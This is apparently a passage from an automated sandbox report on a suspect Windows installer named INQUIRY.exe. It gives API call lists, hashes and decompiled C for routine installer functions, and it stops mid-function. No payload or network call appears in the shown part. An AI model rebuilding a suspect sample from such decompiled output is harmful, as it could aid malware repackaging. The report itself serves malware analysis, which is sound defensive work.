                          0x00404988
                          0x00404989
                          0x0040498f
                          0x00404995
                          0x00404995
                          0x004049a2
                          0x004049bd
                          0x004049c1
                          0x004049de
                          0x004049e3
                          0x004049e6
                          0x004049e6
                          0x00000000
                          0x004049c3
                          0x004049c8
                          0x004049d1
                          0x00404d5e
                          0x00404d70
                          0x00404d70
                          0x004049c1
                          0x00000000
                          0x004049a2
                          0x004048da

                          APIs
                          • GetDlgItem.USER32 ref: 00404789
                          • GetDlgItem.USER32 ref: 00404796
                          • GlobalAlloc.KERNEL32(00000040,00000001), ref: 004047E2
                          • LoadBitmapA.USER32 ref: 004047F5
                          • SetWindowLongA.USER32 ref: 0040480F
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                          • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                          • DeleteObject.GDI32(?), ref: 0040486F
                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                          • GetWindowLongA.USER32 ref: 004049A9
                          • SetWindowLongA.USER32 ref: 004049B7
                          • ShowWindow.USER32(?,00000005), ref: 004049C8
                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                          • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                          • GlobalFree.KERNEL32 ref: 00404BB4
                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                          • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                          • ShowWindow.USER32(?,00000000), ref: 00404D4A
                          • GetDlgItem.USER32 ref: 00404D55
                          • ShowWindow.USER32(00000000), ref: 00404D5C
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 1638840714-813528018
                          • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                          • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                          • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                          • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                          				signed int _v8;
                          				struct HWND__* _v12;
                          				long _v16;
                          				long _v20;
                          				char _v24;
                          				long _v28;
                          				char _v32;
                          				intOrPtr _v36;
                          				long _v40;
                          				signed int _v44;
                          				CHAR* _v52;
                          				intOrPtr _v56;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				CHAR* _v68;
                          				void _v72;
                          				char _v76;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t81;
                          				long _t86;
                          				signed char* _t88;
                          				void* _t94;
                          				signed int _t95;
                          				signed short _t113;
                          				signed int _t117;
                          				char* _t122;
                          				intOrPtr _t124;
                          				intOrPtr* _t138;
                          				signed int* _t145;
                          				intOrPtr _t147;
                          				signed int _t148;
                          				signed int _t153;
                          				struct HWND__* _t159;
                          				CHAR* _t162;
                          				int _t163;
                          
                          				_t81 =  *0x41fc68; // 0x0
                          				_v36 = _t81;
                          				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                          				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                          				if(_a8 == 0x40b) {
                          					E0040532A(0x3fb, _t162);
                          					E00405CE3(_t162);
                          				}
                          				if(_a8 != 0x110) {
                          					L8:
                          					if(_a8 != 0x111) {
                          						L20:
                          						if(_a8 == 0x40f) {
                          							L22:
                          							_v8 = _v8 & 0x00000000;
                          							_v12 = _v12 & 0x00000000;
                          							E0040532A(0x3fb, _t162);
                          							if(E00405659(_t180, _t162) == 0) {
                          								_v8 = 1;
                          							}
                          							E00405A85(0x41f460, _t162);
                          							_t145 = 0;
                          							_t86 = E00405DA3(0);
                          							_v16 = _t86;
                          							if(_t86 == 0) {
                          								L31:
                          								E00405A85(0x41f460, _t162);
                          								_t88 = E0040560C(0x41f460);
                          								if(_t88 != _t145) {
                          									 *_t88 =  *_t88 & 0x00000000;
                          								}
                          								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                          									_t153 = _a8;
                          									goto L37;
                          								} else {
                          									_t163 = 0x400;
                          									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                          									_v12 = 1;
                          									goto L38;
                          								}
                          							} else {
                          								if(0 == 0x41f460) {
                          									L30:
                          									_t145 = 0;
                          									goto L31;
                          								} else {
                          									goto L26;
                          								}
                          								while(1) {
                          									L26:
                          									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
                          									if(_t113 != 0) {
                          										break;
                          									}
                          									if(_t145 != 0) {
                          										 *_t145 =  *_t145 & _t113;
                          									}
                          									_t145 = E004055BF(0x41f460) - 1;
                          									 *_t145 = 0x5c;
                          									if(_t145 != 0x41f460) {
                          										continue;
                          									} else {
                          										goto L30;
                          									}
                          								}
                          								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                          								_v12 = 1;
                          								_t145 = 0;
                          								L37:
                          								_t163 = 0x400;
                          								L38:
                          								_t94 = E004046C5(5);
                          								if(_v12 != _t145 && _t153 < _t94) {
                          									_v8 = 2;
                          								}
                          								_t147 =  *0x42367c; // 0x5233c1
                          								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                          									E00404610(0x3ff, 0xfffffffb, _t94);
                          									if(_v12 == _t145) {
                          										SetDlgItemTextA(_a4, _t163, 0x41f450);
                          									} else {
                          										E00404610(_t163, 0xfffffffc, _t153);
                          									}
                          								}
                          								_t95 = _v8;
                          								 *0x423f44 = _t95;
                          								if(_t95 == _t145) {
                          									_v8 = E0040140B(7);
                          								}
                          								if(( *(_v36 + 0x14) & _t163) != 0) {
                          									_v8 = _t145;
                          								}
                          								E00403E59(0 | _v8 == _t145);
                          								if(_v8 == _t145 &&  *0x420484 == _t145) {
                          									E0040420A();
                          								}
                          								 *0x420484 = _t145;
                          								goto L53;
                          							}
                          						}
                          						_t180 = _a8 - 0x405;
                          						if(_a8 != 0x405) {
                          							goto L53;
                          						}
                          						goto L22;
                          					}
                          					_t117 = _a12 & 0x0000ffff;
                          					if(_t117 != 0x3fb) {
                          						L12:
                          						if(_t117 == 0x3e9) {
                          							_t148 = 7;
                          							memset( &_v72, 0, _t148 << 2);
                          							_v76 = _a4;
                          							_v68 = 0x420498;
                          							_v56 = E004045AA;
                          							_v52 = _t162;
                          							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
                          							_t122 =  &_v76;
                          							_v60 = 0x41;
                          							__imp__SHBrowseForFolderA(_t122);
                          							if(_t122 == 0) {
                          								_a8 = 0x40f;
                          							} else {
                          								__imp__CoTaskMemFree(_t122);
                          								E00405578(_t162);
                          								_t124 =  *0x423eb0; // 0x51d818
                          								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                          								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
                          									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
                          									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
                          										lstrcatA(_t162, 0x422e40);
                          									}
                          								}
                          								 *0x420484 =  &(( *0x420484)[0]);
                          								SetDlgItemTextA(_a4, 0x3fb, _t162);
                          							}
                          						}
                          						goto L20;
                          					}
                          					if(_a12 >> 0x10 != 0x300) {
                          						goto L53;
                          					}
                          					_a8 = 0x40f;
                          					goto L12;
                          				} else {
                          					_t159 = _a4;
                          					_v12 = GetDlgItem(_t159, 0x3fb);
                          					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
                          						E00405578(_t162);
                          					}
                          					 *0x423678 = _t159;
                          					SetWindowTextA(_v12, _t162);
                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                          					_push(1);
                          					E00403E37(_t159);
                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                          					_push(0x14);
                          					E00403E37(_t159);
                          					E00403E6C(_v12);
                          					_t138 = E00405DA3(7);
                          					if(_t138 == 0) {
                          						L53:
                          						return E00403E9E(_a8, _a12, _a16);
                          					}
                          					 *_t138(_v12, 1);
                          					goto L8;
                          				}
                          			}








































                          0x0040427b
                          0x00404282
                          0x0040428e
                          0x0040429c
                          0x004042a4
                          0x004042a8
                          0x004042ae
                          0x004042ae
                          0x004042ba
                          0x0040432e
                          0x00404335
                          0x0040440a
                          0x00404411
                          0x00404420
                          0x00404420
                          0x00404424
                          0x0040442a
                          0x00404437
                          0x00404439
                          0x00404439
                          0x00404447
                          0x0040444c
                          0x0040444f
                          0x00404456
                          0x00404459
                          0x00404490
                          0x00404492
                          0x00404498
                          0x0040449f
                          0x004044a1
                          0x004044a1
                          0x004044bd
                          0x004044f9
                          0x00000000
                          0x004044bf
                          0x004044c2
                          0x004044d6
                          0x004044d8
                          0x00000000
                          0x004044d8
                          0x0040445b
                          0x0040445f
                          0x0040448e
                          0x0040448e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404461
                          0x00404461
                          0x0040446e
                          0x00404473
                          0x00000000
                          0x00000000
                          0x00404477
                          0x00404479
                          0x00404479
                          0x00404484
                          0x00404487
                          0x0040448c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040448c
                          0x004044e7
                          0x004044ee
                          0x004044f5
                          0x004044fc
                          0x004044fc
                          0x00404501
                          0x00404503
                          0x0040450b
                          0x00404511
                          0x00404511
                          0x00404518
                          0x00404521
                          0x0040452b
                          0x00404533
                          0x00404549
                          0x00404535
                          0x00404539
                          0x00404539
                          0x00404533
                          0x0040454e
                          0x00404553
                          0x00404558
                          0x00404561
                          0x00404561
                          0x0040456a
                          0x0040456c
                          0x0040456c
                          0x00404578
                          0x00404580
                          0x0040458a
                          0x0040458a
                          0x0040458f
                          0x00000000
                          0x0040458f
                          0x00404459
                          0x00404413
                          0x0040441a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040441a
                          0x0040433b
                          0x00404341
                          0x0040435b
                          0x00404360
                          0x0040436a
                          0x00404371
                          0x00404380
                          0x00404383
                          0x00404386
                          0x0040438d
                          0x00404395
                          0x00404398
                          0x0040439c
                          0x004043a3
                          0x004043ab
                          0x00404403
                          0x004043ad
                          0x004043ae
                          0x004043b5
                          0x004043ba
                          0x004043bf
                          0x004043c7
                          0x004043d4
                          0x004043e8
                          0x004043ec
                          0x004043ec
                          0x004043e8
                          0x004043f1
                          0x004043fc
                          0x004043fc
                          0x004043ab
                          0x00000000
                          0x00404360
                          0x0040434e
                          0x00000000
                          0x00000000
                          0x00404354
                          0x00000000
                          0x004042bc
                          0x004042bc
                          0x004042c8
                          0x004042d2
                          0x004042df
                          0x004042df
                          0x004042e5
                          0x004042ee
                          0x004042f7
                          0x004042fa
                          0x004042fd
                          0x00404305
                          0x00404308
                          0x0040430b
                          0x00404313
                          0x0040431a
                          0x00404321
                          0x00404595
                          0x004045a7
                          0x004045a7
                          0x0040432c
                          0x00000000
                          0x0040432c

                          APIs
                          • GetDlgItem.USER32 ref: 004042C1
                          • SetWindowTextA.USER32(?,?), ref: 004042EE
                          • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                          • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                          • lstrcmpiA.KERNEL32(xzfdi,00420498,00000000,?,?), ref: 004043E0
                          • lstrcatA.KERNEL32(?,xzfdi), ref: 004043EC
                          • SetDlgItemTextA.USER32 ref: 004043FC
                            • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                            • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                          • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                          • SetDlgItemTextA.USER32 ref: 00404549
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                          • String ID: A$C:\Users\user\AppData\Local\Temp$xzfdi
                          • API String ID: 2246997448-3803636507
                          • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                          • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                          • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                          • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                          				signed int _v8;
                          				struct _ITEMIDLIST* _v12;
                          				signed int _v16;
                          				signed char _v20;
                          				signed char _v24;
                          				signed int _v28;
                          				signed int _t36;
                          				CHAR* _t37;
                          				signed char _t39;
                          				signed int _t40;
                          				int _t41;
                          				char _t51;
                          				char _t52;
                          				char _t54;
                          				char _t56;
                          				void* _t64;
                          				signed int _t68;
                          				intOrPtr _t72;
                          				signed int _t73;
                          				signed char _t74;
                          				intOrPtr _t77;
                          				char _t81;
                          				void* _t83;
                          				CHAR* _t84;
                          				void* _t86;
                          				signed int _t93;
                          				signed int _t95;
                          				void* _t96;
                          
                          				_t86 = __esi;
                          				_t83 = __edi;
                          				_t64 = __ebx;
                          				_t36 = _a8;
                          				if(_t36 < 0) {
                          					_t77 =  *0x42367c; // 0x5233c1
                          					_t36 =  *(_t77 - 4 + _t36 * 4);
                          				}
                          				_t72 =  *0x423ed8; // 0x521d84
                          				_t73 = _t72 + _t36;
                          				_t37 = 0x422e40;
                          				_push(_t64);
                          				_push(_t86);
                          				_push(_t83);
                          				_t84 = 0x422e40;
                          				if(_a4 - 0x422e40 < 0x800) {
                          					_t84 = _a4;
                          					_a4 = _a4 & 0x00000000;
                          				}
                          				while(1) {
                          					_t81 =  *_t73;
                          					if(_t81 == 0) {
                          						break;
                          					}
                          					__eflags = _t84 - _t37 - 0x400;
                          					if(_t84 - _t37 >= 0x400) {
                          						break;
                          					}
                          					_t73 = _t73 + 1;
                          					__eflags = _t81 - 0xfc;
                          					_a8 = _t73;
                          					if(__eflags <= 0) {
                          						if(__eflags != 0) {
                          							 *_t84 = _t81;
                          							_t84 =  &(_t84[1]);
                          							__eflags = _t84;
                          						} else {
                          							 *_t84 =  *_t73;
                          							_t84 =  &(_t84[1]);
                          							_t73 = _t73 + 1;
                          						}
                          						continue;
                          					}
                          					_t39 =  *(_t73 + 1);
                          					_t74 =  *_t73;
                          					_a8 = _a8 + 2;
                          					_v20 = _t39;
                          					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                          					_t68 = _t74;
                          					_t40 = _t39 | 0x00000080;
                          					__eflags = _t81 - 0xfe;
                          					_v28 = _t68;
                          					_v24 = _t74 | 0x00000080;
                          					_v16 = _t40;
                          					if(_t81 != 0xfe) {
                          						__eflags = _t81 - 0xfd;
                          						if(_t81 != 0xfd) {
                          							__eflags = _t81 - 0xff;
                          							if(_t81 == 0xff) {
                          								__eflags = (_t40 | 0xffffffff) - _t93;
                          								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                          							}
                          							L41:
                          							_t41 = lstrlenA(_t84);
                          							_t73 = _a8;
                          							_t84 =  &(_t84[_t41]);
                          							_t37 = 0x422e40;
                          							continue;
                          						}
                          						__eflags = _t93 - 0x1d;
                          						if(_t93 != 0x1d) {
                          							__eflags = (_t93 << 0xa) + 0x424000;
                          							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
                          						} else {
                          							E004059E3(_t84,  *0x423ea8);
                          						}
                          						__eflags = _t93 + 0xffffffeb - 7;
                          						if(_t93 + 0xffffffeb < 7) {
                          							L32:
                          							E00405CE3(_t84);
                          						}
                          						goto L41;
                          					}
                          					_t95 = 2;
                          					_t51 = GetVersion();
                          					__eflags = _t51;
                          					if(_t51 >= 0) {
                          						L12:
                          						_v8 = 1;
                          						L13:
                          						__eflags =  *0x423f24;
                          						if( *0x423f24 != 0) {
                          							_t95 = 4;
                          						}
                          						__eflags = _t68;
                          						if(_t68 >= 0) {
                          							__eflags = _t68 - 0x25;
                          							if(_t68 != 0x25) {
                          								__eflags = _t68 - 0x24;
                          								if(_t68 == 0x24) {
                          									GetWindowsDirectoryA(_t84, 0x400);
                          									_t95 = 0;
                          								}
                          								while(1) {
                          									__eflags = _t95;
                          									if(_t95 == 0) {
                          										goto L29;
                          									}
                          									_t52 =  *0x423ea4; // 0x73951340
                          									_t95 = _t95 - 1;
                          									__eflags = _t52;
                          									if(_t52 == 0) {
                          										L25:
                          										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                          										__eflags = _t54;
                          										if(_t54 != 0) {
                          											L27:
                          											 *_t84 =  *_t84 & 0x00000000;
                          											__eflags =  *_t84;
                          											continue;
                          										}
                          										__imp__SHGetPathFromIDListA(_v12, _t84);
                          										__imp__CoTaskMemFree(_v12);
                          										__eflags = _t54;
                          										if(_t54 != 0) {
                          											goto L29;
                          										}
                          										goto L27;
                          									}
                          									__eflags = _v8;
                          									if(_v8 == 0) {
                          										goto L25;
                          									}
                          									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                          									__eflags = _t56;
                          									if(_t56 == 0) {
                          										goto L29;
                          									}
                          									goto L25;
                          								}
                          								goto L29;
                          							}
                          							GetSystemDirectoryA(_t84, 0x400);
                          							goto L29;
                          						} else {
                          							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
                          							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
                          							__eflags =  *_t84;
                          							if( *_t84 != 0) {
                          								L30:
                          								__eflags = _v20 - 0x1a;
                          								if(_v20 == 0x1a) {
                          									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                          								}
                          								goto L32;
                          							}
                          							E00405AA7(_t71, _t84, _t95, _t84, _v20);
                          							L29:
                          							__eflags =  *_t84;
                          							if( *_t84 == 0) {
                          								goto L32;
                          							}
                          							goto L30;
                          						}
                          					}
                          					__eflags = _t51 - 0x5a04;
                          					if(_t51 == 0x5a04) {
                          						goto L12;
                          					}
                          					__eflags = _v20 - 0x23;
                          					if(_v20 == 0x23) {
                          						goto L12;
                          					}
                          					__eflags = _v20 - 0x2e;
                          					if(_v20 == 0x2e) {
                          						goto L12;
                          					} else {
                          						_v8 = _v8 & 0x00000000;
                          						goto L13;
                          					}
                          				}
                          				 *_t84 =  *_t84 & 0x00000000;
                          				if(_a4 == 0) {
                          					return _t37;
                          				}
                          				return E00405A85(_a4, _t37);
                          			}































                          0x00405aa7
                          0x00405aa7
                          0x00405aa7
                          0x00405aad
                          0x00405ab2
                          0x00405ab4
                          0x00405ac3
                          0x00405ac3
                          0x00405ac5
                          0x00405ace
                          0x00405ad0
                          0x00405ad5
                          0x00405ad8
                          0x00405ad9
                          0x00405ae0
                          0x00405ae2
                          0x00405ae8
                          0x00405aeb
                          0x00405aeb
                          0x00405cc0
                          0x00405cc0
                          0x00405cc4
                          0x00000000
                          0x00000000
                          0x00405af8
                          0x00405afe
                          0x00000000
                          0x00000000
                          0x00405b04
                          0x00405b05
                          0x00405b08
                          0x00405b0b
                          0x00405cb3
                          0x00405cbd
                          0x00405cbf
                          0x00405cbf
                          0x00405cb5
                          0x00405cb7
                          0x00405cb9
                          0x00405cba
                          0x00405cba
                          0x00000000
                          0x00405cb3
                          0x00405b11
                          0x00405b15
                          0x00405b1a
                          0x00405b29
                          0x00405b2c
                          0x00405b2e
                          0x00405b33
                          0x00405b36
                          0x00405b39
                          0x00405b3c
                          0x00405b3f
                          0x00405b42
                          0x00405c5d
                          0x00405c60
                          0x00405c90
                          0x00405c93
                          0x00405c98
                          0x00405c9c
                          0x00405c9c
                          0x00405ca1
                          0x00405ca2
                          0x00405ca7
                          0x00405caa
                          0x00405cac
                          0x00000000
                          0x00405cac
                          0x00405c62
                          0x00405c65
                          0x00405c7a
                          0x00405c81
                          0x00405c67
                          0x00405c6e
                          0x00405c6e
                          0x00405c89
                          0x00405c8c
                          0x00405c55
                          0x00405c56
                          0x00405c56
                          0x00000000
                          0x00405c8c
                          0x00405b4a
                          0x00405b4b
                          0x00405b51
                          0x00405b53
                          0x00405b6d
                          0x00405b6d
                          0x00405b74
                          0x00405b74
                          0x00405b7b
                          0x00405b7f
                          0x00405b7f
                          0x00405b80
                          0x00405b82
                          0x00405bbb
                          0x00405bbe
                          0x00405bce
                          0x00405bd1
                          0x00405bd9
                          0x00405bdf
                          0x00405bdf
                          0x00405c3b
                          0x00405c3b
                          0x00405c3d
                          0x00000000
                          0x00000000
                          0x00405be3
                          0x00405bea
                          0x00405beb
                          0x00405bed
                          0x00405c07
                          0x00405c15
                          0x00405c1b
                          0x00405c1d
                          0x00405c38
                          0x00405c38
                          0x00405c38
                          0x00000000
                          0x00405c38
                          0x00405c23
                          0x00405c2e
                          0x00405c34
                          0x00405c36
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c36
                          0x00405bef
                          0x00405bf2
                          0x00000000
                          0x00000000
                          0x00405c01
                          0x00405c03
                          0x00405c05
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c05
                          0x00000000
                          0x00405c3b
                          0x00405bc6
                          0x00000000
                          0x00405b84
                          0x00405b89
                          0x00405b9f
                          0x00405ba4
                          0x00405ba7
                          0x00405c44
                          0x00405c44
                          0x00405c48
                          0x00405c50
                          0x00405c50
                          0x00000000
                          0x00405c48
                          0x00405bb1
                          0x00405c3f
                          0x00405c3f
                          0x00405c42
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c42
                          0x00405b82
                          0x00405b55
                          0x00405b59
                          0x00000000
                          0x00000000
                          0x00405b5b
                          0x00405b5f
                          0x00000000
                          0x00000000
                          0x00405b61
                          0x00405b65
                          0x00000000
                          0x00405b67
                          0x00405b67
                          0x00000000
                          0x00405b67
                          0x00405b65
                          0x00405cca
                          0x00405cd4
                          0x00405ce0
                          0x00405ce0
                          0x00000000

                          APIs
                          • GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                          • GetSystemDirectoryA.KERNEL32(xzfdi,00000400), ref: 00405BC6
                          • GetWindowsDirectoryA.KERNEL32(xzfdi,00000400), ref: 00405BD9
                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                          • SHGetPathFromIDListA.SHELL32(00000000,xzfdi), ref: 00405C23
                          • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                          • lstrcatA.KERNEL32(xzfdi,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                          • lstrlenA.KERNEL32(xzfdi,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$xzfdi
                          • API String ID: 900638850-1289049640
                          • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                          • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                          • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                          • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E00402012() {
                          				void* _t44;
                          				intOrPtr* _t48;
                          				intOrPtr* _t50;
                          				intOrPtr* _t52;
                          				intOrPtr* _t54;
                          				signed int _t58;
                          				intOrPtr* _t59;
                          				intOrPtr* _t62;
                          				intOrPtr* _t64;
                          				intOrPtr* _t66;
                          				intOrPtr* _t69;
                          				intOrPtr* _t71;
                          				int _t75;
                          				signed int _t81;
                          				intOrPtr* _t88;
                          				void* _t95;
                          				void* _t96;
                          				void* _t100;
                          
                          				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                          				_t96 = E004029E8(0xffffffdf);
                          				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                          				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                          				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                          				if(E004055E5(_t96) == 0) {
                          					E004029E8(0x21);
                          				}
                          				_t44 = _t100 + 8;
                          				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                          				if(_t44 < _t75) {
                          					L13:
                          					 *((intOrPtr*)(_t100 - 4)) = 1;
                          					_push(0xfffffff0);
                          				} else {
                          					_t48 =  *((intOrPtr*)(_t100 + 8));
                          					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                          					if(_t95 >= _t75) {
                          						_t52 =  *((intOrPtr*)(_t100 + 8));
